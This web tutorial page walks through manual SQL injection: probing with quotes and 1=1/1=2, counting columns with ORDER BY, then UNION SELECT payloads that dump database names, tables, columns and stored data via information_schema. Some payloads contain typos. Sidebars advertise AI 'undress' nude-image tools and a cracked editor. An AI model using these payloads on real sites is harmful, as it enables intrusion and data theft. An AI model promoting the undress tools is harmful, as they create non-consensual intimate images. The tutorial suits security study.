This article brings you issues related to manual injection in SQL, including issues related to determining the injection point and determining the injection type. I hope it will be helpful to everyone.
Determine the injection point
1. Single quotation mark method: add a single quotation mark directly after the URL. If the page cannot be displayed normally, the browser will return some exceptions information, it indicates that the link may have a sql injection vulnerability
2.1=1 and 1=2: Add and 1=1 to the get parameter after the URL, the display is normal, replace 1=1 with 1 =2, the display is abnormal, indicating that there is SQL injection in the web page.
Judge the injection type
1. Numeric injection: the value of the injected variable does not need to be enclosed in quotation marks, such as
select * from user where id=$id;
2. Character injection: the injected variable will be used Wrap it in quotation marks, such as `
select * from user where username='$username';`
Be sure to close the quotation marks when injecting.
3. Search injection:
select * from user where username like '%$pass%';
Construct the sql statement as
select * from user where username like '%$pass%' union select语句 '%%';
That is, the transferred variable is pass%’ union select statement ‘% to form a closure.
Determine the injection point submission method
Determine whether the injection point submission method is get, post, or cookie through packet capture and other methods.
Use order by to query fields
Use the order by statement to query how many fields there are in the database. You can determine the number of database fields through constant attempts. For example, when entering oeder by 9, the page When an error is reported and order by 8 is entered, the page displays normally, that is, there are 8 fields in the database.
For example, the query statement is: select * from user where id='$id';
The following input can be constructed: (id = ') ' order by 3 ' --
That is, the query statement is: select * from user where id='' order by 3 '--'
Use joint query to query the current database, user, and version Information
Use the union select statement to query the current user user(), database database(), database version version(), server operating system @@version_compile_os and other information
The version version is very important. If the version In 5.0 and above, you can use the information_schema library to easily query the desired information
Construction statement:
select * from user where id='' union select user(),database(),version()+--+;
Query the tables, columns and values in the current database
5.0 or above The information_schema library that comes with the mysql database stores all table names and listed information in the database.
Next we should check the information of all tables named tables according to the result of the current database query in step 5 (for example, the database is database_1). Information_schema.tables: A table that records all table name information in the database.
The constructed query statement is as follows:
Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--
The result of the query is: the table name information in the current database queried in the fifth step. Information_schema.columns: Records the column name information of all tables in the database;
Next, you should query its columns based on the table name information obtained from the above query (for example, the table is table_1) Name information, construct the statement as follows:
Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--
After querying the column name, you can directly find out the information stored in the table through a joint query (for example, the found column names are column_1, column_2) Constructing the statement
Selcet * from user where id='' union select 1,column_1,column_2 from tables;--
You can query the stored data in the specified table of the specified database
Recommended learning: mysql video tutorial
The above is the detailed content of Let's talk about the simple manual SQL injection process. For more information, please follow other related articles on the PHP Chinese website!
SQL and MySQL: A Beginner's Guide to Data ManagementApr 29, 2025 am 12:50 AMThe difference between SQL and MySQL is that SQL is a language used to manage and operate relational databases, while MySQL is an open source database management system that implements these operations. 1) SQL allows users to define, operate and query data, and implement it through commands such as CREATETABLE, INSERT, SELECT, etc. 2) MySQL, as an RDBMS, supports these SQL commands and provides high performance and reliability. 3) The working principle of SQL is based on relational algebra, and MySQL optimizes performance through mechanisms such as query optimizers and indexes.
SQL's Core Function: Querying and Retrieving InformationApr 28, 2025 am 12:11 AMThe core function of SQL query is to extract, filter and sort information from the database through SELECT statements. 1. Basic usage: Use SELECT to query specific columns from the table, such as SELECTname, departmentFROMemployees. 2. Advanced usage: Combining subqueries and ORDERBY to implement complex queries, such as finding employees with salary above average and sorting them in descending order of salary. 3. Debugging skills: Check for syntax errors, use small-scale data to verify logical errors, and use the EXPLAIN command to optimize performance. 4. Performance optimization: Use indexes, avoid SELECT*, and use subqueries and JOIN reasonably to improve query efficiency.
SQL: The Language of Databases ExplainedApr 27, 2025 am 12:14 AMSQL is the core tool for database operations, used to query, operate and manage databases. 1) SQL allows CRUD operations to be performed, including data query, operations, definition and control. 2) The working principle of SQL includes three steps: parsing, optimizing and executing. 3) Basic usages include creating tables, inserting, querying, updating and deleting data. 4) Advanced usage covers JOIN, subquery and window functions. 5) Common errors include syntax, logic and performance issues, which can be debugged through database error information, check query logic and use the EXPLAIN command. 6) Performance optimization tips include creating indexes, avoiding SELECT* and using JOIN.
SQL: How to Overcome the Learning HurdlesApr 26, 2025 am 12:25 AMTo become an SQL expert, you should master the following strategies: 1. Understand the basic concepts of databases, such as tables, rows, columns, and indexes. 2. Learn the core concepts and working principles of SQL, including parsing, optimization and execution processes. 3. Proficient in basic and advanced SQL operations, such as CRUD, complex queries and window functions. 4. Master debugging skills and use the EXPLAIN command to optimize query performance. 5. Overcome learning challenges through practice, utilizing learning resources, attaching importance to performance optimization and maintaining curiosity.
SQL and Databases: A Perfect PartnershipApr 25, 2025 am 12:04 AMThe relationship between SQL and database is closely integrated, and SQL is a tool for managing and operating databases. 1.SQL is a declarative language used for data definition, operation, query and control. 2. The database engine parses SQL statements and executes query plans. 3. Basic usage includes creating tables, inserting and querying data. 4. Advanced usage involves complex queries and subqueries. 5. Common errors include syntax, logic and performance issues, which can be debugged through syntax checking and EXPLAIN commands. 6. Optimization techniques include using indexes, avoiding full table scanning and optimizing queries.
SQL vs. MySQL: Clarifying the Relationship Between the TwoApr 24, 2025 am 12:02 AMSQL is a standard language for managing relational databases, while MySQL is a database management system that uses SQL. SQL defines ways to interact with a database, including CRUD operations, while MySQL implements the SQL standard and provides additional features such as stored procedures and triggers.
The Importance of SQL: Data Management in the Digital AgeApr 23, 2025 am 12:01 AMSQL's role in data management is to efficiently process and analyze data through query, insert, update and delete operations. 1.SQL is a declarative language that allows users to talk to databases in a structured way. 2. Usage examples include basic SELECT queries and advanced JOIN operations. 3. Common errors such as forgetting the WHERE clause or misusing JOIN, you can debug through the EXPLAIN command. 4. Performance optimization involves the use of indexes and following best practices such as code readability and maintainability.
Getting Started with SQL: Essential Concepts and SkillsApr 22, 2025 am 12:01 AMSQL is a language used to manage and operate relational databases. 1. Create a table: Use CREATETABLE statements, such as CREATETABLEusers(idINTPRIMARYKEY, nameVARCHAR(100), emailVARCHAR(100)); 2. Insert, update, and delete data: Use INSERTINTO, UPDATE, DELETE statements, such as INSERTINTOusers(id, name, email)VALUES(1,'JohnDoe','john@example.com'); 3. Query data: Use SELECT statements, such as SELEC
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Dreamweaver Mac version
Visual web development tools
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
